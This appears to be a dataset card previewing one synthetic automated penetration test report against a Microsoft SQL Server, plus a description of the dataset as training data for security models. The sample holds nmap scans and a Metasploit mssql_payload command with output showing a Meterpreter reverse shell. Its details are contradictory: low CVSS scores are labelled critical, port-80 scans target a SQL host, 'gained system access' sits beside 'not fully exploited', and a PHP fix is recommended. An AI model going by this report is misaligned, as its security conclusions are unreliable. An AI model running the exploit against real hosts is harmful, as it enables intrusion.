Dataset Viewer
Auto-converted to Parquet
text
stringlengths
0
293
=== Automated Penetration Test Report ===
Test ID: PT-2025-05-11-0001
Date: 2025-05-11 19:07:18
Tester: rjohnson
Organization: Acme Security
Confidentiality: STRICTLY CONFIDENTIAL
Test Objective: perform vulnerability scanning against the Microsoft SQL database server (192.168.242.224)
Scope: Internal security assessment
Rules of Engagement: Standard
=== Discovery Phase ===
Tester: nmap -sV -O --script=banner -p1433,1434 192.168.242.224
Tool Output:
Starting Nmap 7.92 at 2025-05-11 19:07:18
Nmap scan report for 192.168.242.224
Host is up (0.56s latency).
MAC Address: A4:1A:67:56:24:FC (Apple)
1433/tcp open ms-sql-s Microsoft SQL Server 2019
1434/tcp open ms-sql-s Microsoft SQL Server 2017
OS details: Windows Server 2019
OS CPE: cpe:/o:microsoft:windows_server_2019:-
Network Distance: 3 hops
Service Info: Hostname: sql-backend-02
Nmap done: 1 IP address (1 host up) scanned in 5 seconds
=== Vulnerability Assessment ===
Tools used:
- OWASP ZAP: Active scanning, AJAX spidering, and automated vulnerability detection
- Burp Suite: Manual testing, session analysis, and business logic flaw identification
- Nmap scripts: Service enumeration and vulnerability verification
- Metasploit: Exploit verification and proof-of-concept testing
## Vulnerability 1: CVE-2020-0618 (RCE via SQL Reporting Services)
CVE: CVE-2020-0618
CVSS Score: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N (2.3)
Primary Tool: OWASP ZAP (Passive Scan), Nmap scripts, and manual testing
Test Method: nmap --script vuln -p80 192.168.242.224
Result:
Security vulnerability identified that could potentially compromise the Microsoft SQL database server. Further investigation recommended to determine exact risk profile.
Remediation: See vendor documentation
## Vulnerability 2: CVE-2021-1636 (RCE via TDS Protocol)
CVE: CVE-2021-1636
CVSS Score: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N (2.8)
Primary Tool: OWASP ZAP (Passive Scan), Nmap scripts, and manual testing
Test Method: nmap --script vuln -p80 192.168.242.224
Result:
Security vulnerability identified that could potentially compromise the Microsoft SQL database server. Further investigation recommended to determine exact risk profile.
Remediation: See vendor documentation
## Vulnerability 3: CVE-2019-1068 (Elevation of Privilege - SQL Server)
CVE: CVE-2019-1068
CVSS Score: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N (2.3)
Primary Tool: OWASP ZAP (Passive Scan), Nmap scripts, and manual testing
Test Method: nmap --script vuln -p80 192.168.242.224
Result:
Security vulnerability identified that could potentially compromise the Microsoft SQL database server. Further investigation recommended to determine exact risk profile.
Remediation: See vendor documentation
=== Exploitation Phase ===
Tool: Metasploit Framework 6.1
Command: msfconsole -q -x "use exploit/windows/sql/mssql_payload; set RHOSTS 192.168.242.224; set RPORT 1433; exploit"
Output:
[*] Exploiting known vulnerabilities:
- CVE-2021-1636 (CVE-2021-1636)
- CVE-2020-0618 (CVE-2020-0618)
- CVE-2019-1068 (CVE-2019-1068)
[*] Started reverse TCP handler on port 1433
[*] Sending payload...
[*] Sending stage (320 bytes)
[*] Meterpreter session 2 opened
[*] Session established
[*] Gained system access
[*] Connected to 192.168.242.224
[*] Post-exploitation modules available:
- mssql_enum
- mssql_sql
- mssql_exec
=== Final Assessment ===
Overall Risk Rating: High
Confidence Level: Medium
Confidence Rationale: Vulnerability was identified through static analysis or behavioral patterns but not fully exploited
Key Findings:
- 3 critical vulnerabilities identified
- 5 high risk issues found
- System configuration needs hardening
Recommendations:
1. Validate and sanitize file paths, disable dangerous PHP functions, and use allowlists. Review OWASP Cheat Sheet for this vulnerability type and implement defense-in-depth controls.
2. Upgrade to latest SQL Server version and apply security patches. Disable obsolete TDS versions. Review OWASP Cheat Sheet for this vulnerability type and implement defense-in-depth controls.
End of preview. Expand in Data Studio

πŸ“„ 100 Samples of Synthetic Automated Penetration Test Reports

This dataset contains 100+ realistic, synthetic penetration testing reports structured to simulate professional internal security assessments. Each record models the full flow of a pentest engagement, including:

  • Reconnaissance / Discovery Phase
  • Vulnerability Assessment (with CVE tagging)
  • Exploitation Attempts (success/failure)
  • Final Risk Ratings and Recommendations

These reports are ideal for training LLMs, security copilots, vulnerability classifiers, and summarization agents focused on cybersecurity operations and incident response.


πŸ“š Dataset Structure

Each entry includes:

  • Test Metadata: ID, tester, organization, IPs, confidentiality level
  • Discovery Phase: Simulated nmap or banner-grab output
  • Vulnerability Assessment: CVEs, CVSS scores, tools used (ZAP, Burp Suite, Metasploit)
  • Exploitation Results: Command-line tools, outcomes, reverse shell sessions
  • Risk Summary: Confidence level, remediation, OWASP-aligned recommendations

All entities such as hostnames, ports, and vulnerabilities are synthetically generated for training purposes. No real systems or data are used.

Downloads last month
96